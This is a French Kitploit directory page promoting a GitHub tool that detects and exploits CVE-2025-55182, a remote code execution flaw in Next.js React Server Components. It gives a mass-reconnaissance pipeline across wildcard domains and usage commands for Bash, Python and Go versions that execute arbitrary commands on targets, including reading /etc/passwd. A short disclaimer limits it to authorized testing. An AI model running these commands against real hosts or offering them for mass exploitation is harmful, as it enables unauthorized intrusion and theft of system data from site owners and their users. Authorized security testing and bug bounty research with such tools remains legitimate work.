Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/jan0x190/cve-2025-55182-simple-scanner-main
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionÉnumération de Sous-domainesApprentissage et Éducation
GitHubjan0x190/cve-2025-55182-simple-scanner-main

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

CVE-2025-55182-Simple-Scanner-main

Scanner multilingue pour la RCE CVE-2025-55182 dans les composants serveur React de Next.js, avec des modes de balayage simple/multiple et un flux de travail de reconnaissance bug bounty intégré.

Voir le dépôt
14il y a 9 moisPas encore vérifié
Partager

CVE-2025-55182 : Scanner RCE pour les Composants Serveur React

Une boîte à outils complète pour détecter et exploiter CVE-2025-55182, une vulnérabilité critique d'exécution de code à distance dans les applications Next.js utilisant les Composants Serveur React.

Ce dépôt propose un scanner Bash unifié (mode Unique & Masse), des implémentations Python/Go, et un workflow de reconnaissance pour bug bounty.

Menu du scanner Démonstration du scanner


📂 Structure du dépôt

  • scanner.sh — Script Bash tout-en-un pour cible unique et scan de masse
  • python/exploit.py — Implémentation Python stable (meilleur échappement JSON)
  • go/main.go — Implémentation haute performance (compilable)

🚀 Workflow de reconnaissance (Méthodologie Bug Bounty)

Pour la chasse en masse sur les domaines génériques, utilisez ce pipeline pour filtrer les cibles avant le scan :

root@kitploit:~
# 1. Énumération des sous-domaines
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filtrage des hôtes actifs
httpx -l subs.txt -o live.txt

# 3. Détection pré-scan avec Nuclei (optionnel)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Utilisation du scanner Bash (Recommandé)

Le script scanner.sh prend en charge les scans de cible unique et les scans de masse à partir d'une liste de fichiers.

🔧 Installation

root@kitploit:~
chmod +x scanner.sh

1️⃣ Mode Cible Unique

Idéal pour vérifier une cible spécifique avec une sortie détaillée.

root@kitploit:~
# Vérification de base (par défaut "id")
./scanner.sh -d example.com

# Exécution d'une commande personnalisée
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ Mode Scan de Masse

Scanne efficacement une liste d'URL et enregistre les hôtes vulnérables dans un fichier.

root@kitploit:~
# Scanner une liste d'URL
./scanner.sh -l live.txt -c "whoami"

# Fichier de sortie personnalisé
./scanner.sh -l live.txt -o my_bounty.txt

Options


🐍 Version Python

Utilisez-la si vous rencontrez des problèmes avec l'échappement des caractères spéciaux en Bash.

Prérequis

root@kitploit:~
pip install requests

Utilisation

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Version Go

Haute performance, dépendances minimales.

Exécution directe

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

Compilation binaire

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives et aux tests de sécurité autorisés. Toute utilisation non autorisée est strictement illégale. Le développeur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce programme.


🔗 Références

  • Détail NVD CVE : https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • Avis de sécurité React (Vulnérabilité des Composants Serveur React) : https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • Modèle Nuclei de ProjectDiscovery : https://cloud.projectdiscovery.io/library/CVE-2025-55182

Télécharger l’outil
FlagDescription
-d, --domainURL cible unique
-l, --listFichier contenant une liste d'URL
-c, --commandCommande à exécuter (par défaut : id)
-o, --outputFichier de sortie pour les hôtes vulnérables (par défaut : vulnerable_hosts.txt)